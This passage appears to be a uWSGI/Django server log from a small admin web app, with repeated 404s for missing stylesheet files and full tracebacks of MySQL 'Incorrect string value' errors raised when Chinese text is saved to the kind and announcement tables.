/static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1099/1400] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:30 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1100/1401] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:30 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1101/1402] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:06:30 2021] GET /static/css/animate.css => generated 3513 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1102/1403] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:06:30 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1103/1404] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:06:30 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1104/1405] 219.228.146.156 () {42 vars in 965 bytes} [Thu Jan 14 09:06:41 2021] GET /kind-manage/? => generated 7366 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1105/1406] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:06:41 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1106/1407] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:06:41 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1107/1408] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:06:41 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1108/1409] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:06:41 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1110/1410] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:41 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1110/1411] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:41 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 16 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1111/1412] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:06:41 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1112/1413] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:06:41 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1113/1414] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:06:41 2021] GET /static/css/animate.css => generated 3513 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Internal Server Error: /kind-manage/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD...' for column 'k_name' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 541, in kind_manage + models.Kind.objects.create(k_name=k_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD...' for column 'k_name' at row 1") +[pid: 11057|app: 0|req: 1114/1415] 219.228.146.156 () {48 vars in 1029 bytes} [Thu Jan 14 09:06:46 2021] POST /kind-manage/? => generated 207098 bytes in 113 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1115/1416] 219.228.146.156 () {40 vars in 935 bytes} [Thu Jan 14 09:06:47 2021] GET /kind-manage/? => generated 7366 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.156 client_port: 52734] hr_write(): Broken pipe [plugins/http/http.c line 565] +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1116/1417] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:06:47 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1117/1418] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:06:47 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1118/1419] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:06:47 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1119/1420] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:47 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1120/1421] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:47 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1121/1422] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:06:47 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 48 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1122/1423] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:06:47 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1123/1424] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:06:47 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1124/1425] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:06:47 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1125/1426] 219.228.146.156 () {40 vars in 936 bytes} [Thu Jan 14 09:06:54 2021] GET /announcement/ => generated 7421 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1126/1427] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:06:55 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1127/1428] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:06:55 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1128/1429] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:55 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1129/1430] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:06:55 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1130/1431] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:55 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1131/1432] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:06:55 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 30 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1132/1433] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:06:55 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1133/1434] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:06:55 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1134/1435] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:06:55 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1136/1436] 219.228.146.156 () {40 vars in 937 bytes} [Thu Jan 14 09:07:01 2021] GET /announcement/? => generated 7421 bytes in 41 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Internal Server Error: /announcement/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD' for column 'a_title' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 477, in announcement + models.Announcement.objects.create(a_title=a_title, a_content=a_content) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD' for column 'a_title' at row 1") +[pid: 11057|app: 0|req: 1136/1437] 219.228.146.156 () {48 vars in 1030 bytes} [Thu Jan 14 09:07:01 2021] POST /announcement/ => generated 208408 bytes in 164 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: /announcement/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD' for column 'a_title' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 477, in announcement + models.Announcement.objects.create(a_title=a_title, a_content=a_content) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD' for column 'a_title' at row 1") +[pid: 11057|app: 0|req: 1137/1438] 219.228.146.156 () {48 vars in 1030 bytes} [Thu Jan 14 09:07:02 2021] POST /announcement/ => generated 208408 bytes in 108 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1138/1439] 219.228.146.156 () {40 vars in 937 bytes} [Thu Jan 14 09:07:03 2021] GET /announcement/? => generated 7421 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.156 client_port: 59134] hr_write(): Broken pipe [plugins/http/http.c line 565] +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1139/1440] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:07:03 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.156 client_port: 59902] hr_write(): Broken pipe [plugins/http/http.c line 565] +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1140/1441] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:07:03 2021] GET 